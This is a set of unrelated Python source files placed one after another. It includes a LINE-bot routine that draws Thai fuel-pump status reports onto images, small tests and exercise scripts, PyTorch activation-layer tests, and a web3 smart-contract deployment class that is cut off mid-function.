color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((430,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,760), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,760), Status, fill=color_status, font=fnt_report_name)
draw.text((140,830), 'หน้าจ่าย : ' , fill=color, font=fnt_report_name)
draw.text((1230, 830), str(result_site.NOZZLE_pump_log_address), fill=color, font=fnt_report_name)
draw.text((140,900), 'มือจ่าย :' , fill=color, font=fnt_report_name)
draw.text((1230, 900), str(result_site.NOZZLE_num), fill=color, font=fnt_report_name)
draw.text((140,975), 'BatteryVolt. ' , fill=color, font=fnt_report_name)
draw.text((1170, 975), str(result_site.NOZZLE_Battery_Status_Volts), fill=color, font=fnt_report_name)
draw.text((140, 1050), str('SerialNo : '), fill=color, font=fnt_report_name)
draw.text((1080, 1050), str(result_site.NOZZLE_SN), fill=color, font=fnt_report_name)
draw.text((140, 1120), str('LastCon : '), fill=color, font=fnt_report_name)
draw.text((930, 1120), str(result_site.NOZZLE_Last_conn), fill=color, font=fnt_report_name)
draw.text((140, 1200), str('ติดต่อไม่ได้เมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1200), str(Error_start), fill=color, font=fnt_report_name)
draw.text((140, 1280), str('ขาดการติดต่อเมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1280), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140, 1350), str('ขาดการติดต่อนาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1350), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1420), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((920, 1420), 'คุณ : '+result_site.site.team_support.team_name, fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-OFFLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
elif Status == 'ON-LINE' :
result_site = site_profile # return value from linebot/connect_db_profile/get_site_profile, index 0
day_loss = line_data[0] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 0
hours_loss = line_data[1] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 1
minutes_loss = line_data[2] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 2
datetime_now = line_data[3] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 3
Error_start = line_data[4] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 4
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-ONLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((430,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,760), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,760), Status, fill=color_status, font=fnt_report_name)
draw.text((140,830), 'หน้าจ่าย : ' , fill=color, font=fnt_report_name)
draw.text((1230, 830), str(result_site.NOZZLE_pump_log_address), fill=color, font=fnt_report_name)
draw.text((140,900), 'มือจ่าย :' , fill=color, font=fnt_report_name)
draw.text((1230, 900), str(result_site.NOZZLE_num), fill=color, font=fnt_report_name)
draw.text((140,975), 'BatteryVolt. ' , fill=color, font=fnt_report_name)
draw.text((1170, 975), str(result_site.NOZZLE_Battery_Status_Volts), fill=color, font=fnt_report_name)
draw.text((140, 1050), str('SerialNo : '), fill=color, font=fnt_report_name)
draw.text((1080, 1050), str(result_site.NOZZLE_SN), fill=color, font=fnt_report_name)
draw.text((140, 1120), str('LastCon : '), fill=color, font=fnt_report_name)
draw.text((930, 1120), str(result_site.NOZZLE_Last_conn), fill=color, font=fnt_report_name)
draw.text((140, 1200), str('ติดต่อไม่ได้เมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1200), str(Error_start), fill=color, font=fnt_report_name)
draw.text((140, 1280), str('ติดต่อได้แล้วเมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1280), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140, 1350), str('ขาดการติดต่อนาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1350), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1420), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((920, 1420), 'คุณ : '+result_site.site.team_support.team_name, fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
def CreatingPictureForBATTERY(Status_in,site_profile):
if Status_in == 'NORMAL':
Header_type = 'BATTERY : NORMAL'
Header_IP_TYPE = 'MWGT : IP '
Status = 'NORMAL'
color_status = 'rgb(0,255,0)'
elif Status_in == 'LOW':
Header_type = 'BATTERY : LOW'
Header_IP_TYPE = 'MWGT : IP '
Status = 'LOW'
color_status = 'rgb(255,128,0)'
elif Status_in == 'ALARM':
Header_type = 'BATTERY : ALARM'
Header_IP_TYPE = 'MWGT : IP '
Status = 'ALARM'
color_status = 'rgb(220,20,60)'
result_site = site_profile # return value from linebot/connect_db_profile/get_site_profile, index 0
# day_loss = line_data[0] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 0
# hours_loss = line_data[1] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 1
# minutes_loss = line_data[2] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 2
# datetime_now = line_data[3] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 3
# Error_start = line_data[4] # from linebot/calculate_function/different_time_calculate, which returns 5 values; index 4
datetime_now = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'BATTERY-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((430,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,760), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1110,760), Status, fill=color_status, font=fnt_report_name)
draw.text((140,830), 'หน้าจ่าย : ' , fill=color, font=fnt_report_name)
draw.text((1230, 830), str(result_site.NOZZLE_pump_log_address), fill=color, font=fnt_report_name)
draw.text((140,900), 'มือจ่าย :' , fill=color, font=fnt_report_name)
draw.text((1230, 900), str(result_site.NOZZLE_num), fill=color, font=fnt_report_name)
draw.text((140,975), 'BatteryVolt. ' , fill=color, font=fnt_report_name)
draw.text((1170, 975), str(result_site.NOZZLE_Battery_Status_Volts), fill=color, font=fnt_report_name)
draw.text((140, 1050), str('SerialNo : '), fill=color, font=fnt_report_name)
draw.text((1080, 1050), str(result_site.NOZZLE_SN), fill=color, font=fnt_report_name)
draw.text((140, 1120), str('LastCon : '), fill=color, font=fnt_report_name)
draw.text((930, 1120), str(result_site.NOZZLE_Last_conn), fill=color, font=fnt_report_name)
# draw.text((140, 1200), str('ติิดต่อไม่ได้เมื่อ : '), fill=color, font=fnt_report_name)
# draw.text((960, 1200), str(Error_start), fill=color, font=fnt_report_name)
# draw.text((140, 1280), str('ขาดการติดต่อเมื่อ : '), fill=color, font=fnt_report_name)
# draw.text((960, 1280), str(datetime_now), fill=color, font=fnt_report_name)
# draw.text((140, 1350), str('ขาดการติดต่อนาน : '), fill=color, font=fnt_report_name)
# draw.text((890, 1350), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1420), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((920, 1420), 'คุณ : '+result_site.site.team_support.team_name, fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-OFFLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
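Each of the report renderers above repeats the same path setup (template image, Thai font, timestamped output file). A minimal sketch of that shared block factored into one helper — the name `build_report_paths` and its signature are illustrative, not part of the original module. Note the original `"%d-%m-%y-%H:%M"` stamp contains a colon, which is not a legal filename character on the Windows servers the comments mention, so the sketch uses a hyphen instead:

```python
import datetime
import os


def build_report_paths(module_dir, prefix, form_file="VIS-FORM.jpg"):
    """Return (template, font, output) paths used by the report renderers."""
    # ':' from "%H:%M" is invalid in Windows filenames, so use '-' instead.
    stamp = datetime.datetime.now().strftime("%d-%m-%y-%H-%M")
    template = os.path.join(module_dir, "line_folder", "picture_store", form_file)
    font = os.path.join(module_dir, "line_folder", "font", "THSarabunNew.ttf")
    output = os.path.join(
        module_dir, "line_folder", "picture_for_send", prefix + stamp + ".jpg"
    )
    return template, font, output
```

Calling this once at the top of each branch would replace the five `os.path.join` lines duplicated in every function above.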
# --- pylearn2/scripts/tutorials/deep_trainer/test_deep_trainer.py (BouchardLab/pylearn2, BSD-3-Clause) ---
"""
A simple unit test of 'run_deep_trainer.py'
"""
from .run_deep_trainer import main
def test_deep_trainer():
# pass args=[] so we can pass options to nosetests on the command line
main(args=[])
# --- URI1096.py (rashidulhasanhridoy/URI-Online-Judge-Problem-Solve-with-Python-3, Apache-2.0) ---
I = -1
for i in range(1, 6):
i = I + 2
print('I=%d J=%d' % (i, 7))
print('I=%d J=%d' % (i, 6))
print('I=%d J=%d' % (i, 5))
I = i
# --- tests/layers/test_biased_activations.py (kynk94/torch-firewood, MIT) ---
import random
import pytest
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
from firewood.layers.biased_activations import BiasedActivation
from tests.helpers.runif import runif
from tests.stylegan3.torch_utils.ops.bias_act import activation_funcs, bias_act
@pytest.mark.xfail(raises=ValueError)
def test_not_supported_activation_func():
BiasedActivation(activation="invalid")
def test_bias_gain_clamp():
bias_gain = 0.5
biased_activation = BiasedActivation(
activation="relu", gain=1.0, bias_gain=bias_gain, clamp=0.5
)
relu = nn.ReLU()
input = torch.randn(2, 3, 5, 5)
bias = torch.randn(3)
biased_activation_output: Tensor = biased_activation(input, bias)
relu_output: Tensor = relu(input + bias_gain * bias.view(1, -1, 1, 1))
relu_output = relu_output.clamp_(-0.5, 0.5)
assert torch.allclose(
biased_activation_output, relu_output
), f"Forward result mismatch. l1: {F.l1_loss(biased_activation_output, relu_output)}"
@pytest.mark.parametrize("activation", activation_funcs)
def test_with_bias_cpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
if activation == "elu":
alpha = 1.0
custom_operation = BiasedActivation(activation, alpha=alpha)
x_custom = torch.randn(2, embedding_size, requires_grad=True)
b_custom = torch.randn(embedding_size, requires_grad=True)
x_original = x_custom.detach().requires_grad_()
b_original = b_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom, b_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original, b_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom, b_custom)
y_original: Tensor = bias_act(
x_original,
b_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="ref",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward input mismatch. l1: {F.l1_loss(x_custom, x_original)}"
assert torch.allclose(
b_custom, b_original
), f"Backward bias mismatch. l1: {F.l1_loss(b_custom, b_original)}"
@pytest.mark.parametrize("activation", activation_funcs)
def test_without_bias_cpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
if activation == "elu":
alpha = 1.0
custom_operation = BiasedActivation(activation, alpha=alpha)
x_custom = torch.randn(2, embedding_size, requires_grad=True)
x_original = x_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom)
y_original: Tensor = bias_act(
x_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="ref",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward result mismatch. l1: {F.l1_loss(x_custom, x_original)}"
@runif(min_gpus=1)
@pytest.mark.parametrize("activation", activation_funcs)
def test_with_bias_gpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
custom_operation = BiasedActivation(activation, alpha=alpha).cuda()
x_custom = torch.randn(2, embedding_size, requires_grad=True, device="cuda")
b_custom = torch.randn(embedding_size, requires_grad=True, device="cuda")
x_original = x_custom.detach().requires_grad_()
b_original = b_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom, b_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original, b_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom, b_custom)
y_original: Tensor = bias_act(
x_original,
b_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="cuda",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward input mismatch. l1: {F.l1_loss(x_custom, x_original)}"
assert torch.allclose(
b_custom, b_original
), f"Backward bias mismatch. l1: {F.l1_loss(b_custom, b_original)}"
@runif(min_gpus=1)
@pytest.mark.parametrize("activation", activation_funcs)
def test_without_bias_gpu(activation: str) -> None:
lr = 1e-2
embedding_size = random.randint(1, 32)
alpha = activation_funcs[activation]["def_alpha"]
custom_operation = BiasedActivation(activation, alpha=alpha).cuda()
x_custom = torch.randn(2, embedding_size, requires_grad=True, device="cuda")
x_original = x_custom.detach().requires_grad_()
optimizer_custom = torch.optim.Adam([x_custom], lr=lr)
optimizer_original = torch.optim.Adam([x_original], lr=lr)
optimizer_custom.zero_grad()
optimizer_original.zero_grad()
y_custom: Tensor = custom_operation(x_custom)
y_original: Tensor = bias_act(
x_original,
act=activation,
alpha=alpha,
gain=custom_operation.gain,
impl="cuda",
)
assert torch.allclose(
y_custom, y_original
), f"Forward result mismatch. l1: {F.l1_loss(y_custom, y_original)}"
loss_custom = y_custom.square().sum()
loss_original = y_original.square().sum()
loss_custom.backward()
loss_original.backward()
optimizer_custom.step()
optimizer_original.step()
assert torch.allclose(
x_custom, x_original
), f"Backward result mismatch. l1: {F.l1_loss(x_custom, x_original)}"
# --- code/argv_list.py (seanemccartney/python-novice-inflammation, CC-BY-4.0) ---
import sys
print('sys.argv is', sys.argv)
# --- cobra/project/migration/deployment.py (frankenstien-831/cobra, MIT) ---
from cobra.project.migration import *
import web3
class Deployment(Provider):
def __init__(self, _network, more=False):
self.more = more
self.network = _network
self.web3 = self.get_web3()
self.account = self.get_account()
self.hdwallet = self.get_hdwallet()
def get_transact(self, artifact):
try:
networks = artifact["networks"]
if networks:
for __network in networks.keys():
deployed = networks.get(__network)
if "contractAddress" in deployed and "transactionHash" in deployed:
if deployed["contractAddress"] == "Unknown" and deployed["transactionHash"]:
try:
get_transaction_receipt = self.web3.eth\
.getTransactionReceipt(deployed["transactionHash"])
if get_transaction_receipt:
deployed["contractAddress"] = get_transaction_receipt["contractAddress"]
artifact['updatedAt'] = str(datetime.now())
else:
continue
except ValueError:
continue
else:
continue
else:
continue
return artifact
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "IPCConnectionPool")
sys.exit()
except KeyError as key_error:
console_log(str(key_error), "error", "KeyError")
sys.exit()
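The core of `get_transact` above is a loop that back-fills `contractAddress` fields recorded as `"Unknown"` once a transaction receipt becomes available. That loop can be sketched with the node lookup injected as a callable, which makes it testable without a running node — the helper name `fill_contract_addresses` is illustrative, not part of this class:

```python
def fill_contract_addresses(networks, get_receipt):
    """Back-fill 'Unknown' contract addresses from transaction receipts.

    `get_receipt` is any callable mapping a tx hash to a receipt dict,
    or None while the transaction is still pending.
    Returns True if at least one address was filled in.
    """
    updated = False
    for deployed in networks.values():
        if deployed.get("contractAddress") == "Unknown" and deployed.get("transactionHash"):
            receipt = get_receipt(deployed["transactionHash"])
            if receipt:
                deployed["contractAddress"] = receipt["contractAddress"]
                updated = True
    return updated
```

In the real method, `get_receipt` would be `self.web3.eth.getTransactionReceipt`, and a `True` result would trigger the `updatedAt` refresh.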
def is_deployed(self, artifact):
try:
networks = artifact['networks']
if networks:
for __network in networks.keys():
deployed = networks.get(__network)
try:
deployed_web3 = self.web3.eth.getTransactionReceipt(deployed['transactionHash'])
if deployed['contractAddress'] == deployed_web3['contractAddress']:
return True
else:
continue
except TypeError:
continue
else:
self.web3.eth.getTransactionReceipt(str())  # no recorded deployments; still hit the node so connection errors surface
return False
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "IPCConnectionPool")
sys.exit()
except KeyError:
return False
def get_links_address(self, dir_path, links):
contract_name_and_address = dict()
contract_name_and_unknown_address = dict()
for link in links:
link_file_path = join(dir_path, link)
artifact_not_loads = file_reader(link_file_path)
try:
artifact = loads(artifact_not_loads)
if 'networks' in artifact:
networks = artifact['networks']
if not networks:
link_name = link[:-5]
contract_name_and_unknown_address.setdefault(link_name, "Unknown")
continue
for __network in networks.keys():
deployed = networks.get(__network)
if "contractAddress" in deployed and "transactionHash" in deployed:
try:
if deployed["contractAddress"] and deployed["transactionHash"]:
deployed_web3 = self.web3.eth.getTransactionReceipt(deployed['transactionHash'])
if deployed_web3 is not None:  # receipt is None for pending or unknown transactions
if deployed['contractAddress'] == deployed_web3['contractAddress']:
link_name = link[:-5]
contract_name_and_address.setdefault(link_name, deployed['contractAddress'])
else:
link_name = link[:-5]
contract_name_and_unknown_address.setdefault(link_name, "Unknown")
elif deployed['contractAddress'] == "Unknown":
link_name = link[:-5]
contract_name_and_unknown_address.setdefault(link_name, "Unknown")
except ValueError:
continue
else:
continue
else:
console_log("networks in %s" % str(link), "error", "NotFound")
except json.decoder.JSONDecodeError as jsonDecodeError:
console_log(str(jsonDecodeError), "error", "JSONDecodeError")
sys.exit()
return contract_name_and_address, contract_name_and_unknown_address
def deploy_contract(self, contract):
try:
if self.account is not None:
# self.web3.personal.unlockAccount(self.hdwallet['private_key'], None)
if 'gas' in self.account:
if 'gas_price' in self.account:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': self.account['gas'],
'gasPrice': self.account['gas_price']
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
else:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': self.account['gas'],
'gasPrice': self.web3.eth.gasPrice
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
else:
if 'gas_price' in self.account:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': 3000000,
'gasPrice': self.account['gas_price']
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
else:
transaction = {
'from': self.web3.toChecksumAddress(self.account['address']),
'gas': 3000000,
'gasPrice': self.web3.eth.gasPrice
}
tx_hash = contract.deploy(transaction=transaction)
return tx_hash
elif self.hdwallet is not None:
if 'gas' in self.hdwallet:
if 'gas_price' in self.hdwallet:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': self.hdwallet['gas'],
'gasPrice': self.hdwallet['gas_price']
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': self.hdwallet['gas'],
'gasPrice': self.web3.eth.gasPrice
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
if 'gas_price' in self.hdwallet:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': 3000000,
'gasPrice': self.hdwallet['gas_price']
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
account = self.web3.eth.account.privateKeyToAccount(self.hdwallet['private_key'])
construct_txn = contract.constructor().buildTransaction({
'from': account.address,
'value': 0,
'nonce': self.web3.eth.getTransactionCount(account.address),
'gas': 3000000,
'gasPrice': self.web3.eth.gasPrice
})
signed = account.signTransaction(construct_txn)
tx_hash = self.web3.eth.sendRawTransaction(signed.rawTransaction)
return tx_hash
else:
transaction = {
'from': self.web3.eth.accounts[0],
'gas': 3000000,
'gasPrice': self.web3.eth.gasPrice
}
tx_hash = contract.constructor().transact(transaction=transaction)
return tx_hash
except ValueError as valueError:
value_error = valueError.args[0]
if 'message' in value_error and not self.more:
message = str(value_error['message'])
split_message = message.split('\n')
console_log("%s" % split_message[0],
"error")
elif 'message' in value_error and self.more:
message = str(value_error['message'])
console_log("%s" % message,
"error")
elif not self.more:
message = str(value_error)
console_log("%s..." % message[:75],
"error")
elif self.more:
message = str(value_error)
console_log("%s..." % message,
"error")
sys.exit()
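`deploy_contract` above builds the same transaction dict four times per wallet type, varying only the gas defaults. The fallback logic can be sketched as one small helper — the name `build_tx_params` and the plain-dict interface are assumptions for illustration; the real method would still need to route between `contract.deploy` and the signed raw-transaction path:

```python
DEFAULT_GAS = 3000000


def build_tx_params(sender, wallet, default_gas_price=None):
    """Build transaction parameters, falling back to defaults when the
    wallet config omits 'gas' or 'gas_price'."""
    return {
        "from": sender,
        "gas": wallet.get("gas", DEFAULT_GAS),
        "gasPrice": wallet.get("gas_price", default_gas_price),
    }
```

With this, each branch reduces to `build_tx_params(address, self.account or self.hdwallet, self.web3.eth.gasPrice)` instead of an inline dict.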
@staticmethod
def check_unknown_addresses(link_unknown_address):
if isinstance(link_unknown_address, dict) and link_unknown_address:
for contract_name in link_unknown_address.keys():
console_log(title="Unknown", _type="error",
text="%s link address!" % str(contract_name))
sys.exit()
return
def deploy_with_link(self, dir_path, contract, links, more=False):
contract_name = str(contract[:-5])
file_path = join(dir_path, contract)
artifact_not_loads = file_reader(file_path)
try:
_artifact = loads(artifact_not_loads)
except json.decoder.JSONDecodeError as jsonDecodeError:
console_log("%s" % jsonDecodeError, "error", "JSONDecodeError")
return
artifact = self.get_transact(_artifact)
if not self.is_deployed(artifact):
console_log("Deploying " + contract_name + "...")
abi = artifact['abi']
unlinked_bytecode = artifact['bin']
get_link_address, get_link_unknown_address = self.get_links_address(dir_path, links)
self.check_unknown_addresses(get_link_unknown_address)
linked_bytecode = link_code(unlinked_bytecode, get_link_address)
try:
contract = self.web3.eth.contract(abi=abi, bytecode=linked_bytecode)
# Deploy the contract and receive the transaction hash
try:
tx_hash = self.deploy_contract(contract)
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "IPCConnectionPool")
sys.exit()
try:
transaction_receipt = self.web3.eth.waitForTransactionReceipt(tx_hash, timeout=720)
address = transaction_receipt['contractAddress']
deployed = {
"links": dict(),
"contractAddress": address,
"transactionHash": self.web3.toHex(tx_hash)
}
link = deployed.get("links")
for link_name, link_addr in get_link_address.items():
link.setdefault(link_name, link_addr)
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s done!" % contract_name, _type="success")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="success")
console_log(title="Address", space=True,
text=str(address), _type="success")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
except web3.utils.threads.Timeout as timeout:
address = "Unknown"
deployed = {
"links": dict(),
"contractAddress": address,
"transactionHash": self.web3.toHex(tx_hash)
}
link = deployed.get("links")
for link_name, link_addr in get_link_address.items():
link.setdefault(link_name, link_addr)
artifact['networks'].setdefault(generate_numbers(), deployed)
artifact['updatedAt'] = str(datetime.now())
console_log(title="Deploy",
text="%s not done!" % contract_name, _type="warning")
console_log(title="TransactionHash", space=True,
text=str(self.web3.toHex(tx_hash)), _type="warning")
console_log(title="Address", space=True,
text=str(address), _type="warning")
console_log(title="Timeout", _type="error",
text="%s, %s still on mining!" % (str(timeout),
str(self.web3.toHex(tx_hash))))
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
except KeyError:
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
else:
console_log(title="Deploy", text="%s already deployed." %
contract_name, _type="warning")
artifact = self.web3.toText(dumps(artifact, indent=1).encode())
return artifact
def deploy_with_out_link(self, dir_path, contract, more=False):
file_path = join(dir_path, contract)
contract_name = str(contract[:-5])
artifact_not_loads = file_reader(file_path)
try:
_artifact = loads(artifact_not_loads)
except json.decoder.JSONDecodeError as jsonDecodeError:
console_log("%s" % jsonDecodeError, "error", "JSONDecodeError")
sys.exit()
artifact = self.get_transact(_artifact)
if not self.is_deployed(artifact):
console_log("Deploying " + contract_name + "...")
abi = artifact['abi']
bytecode = artifact['bin']
contract = self.web3.eth.contract(abi=abi, bytecode=bytecode)
# Deploy the contract and receive the transaction hash
try:
tx_hash = self.deploy_contract(contract)
except requests.exceptions.ConnectionError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "HTTPConnectionPool")
sys.exit()
except websockets.exceptions.InvalidMessage:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "WebSocketsConnectionPool")
sys.exit()
except FileNotFoundError:
console_log(
"'%s' failed!" % (self.get_url_host_port()),
"error", "IPCConnectionPool")
sys.exit()
try:
transaction_receipt = self.web3.eth.waitForTransactionReceipt(tx_hash, timeout=720)
address = transaction_receipt['contractAddress']
deployed = {
"links": dict(),
"contractAddress": address,
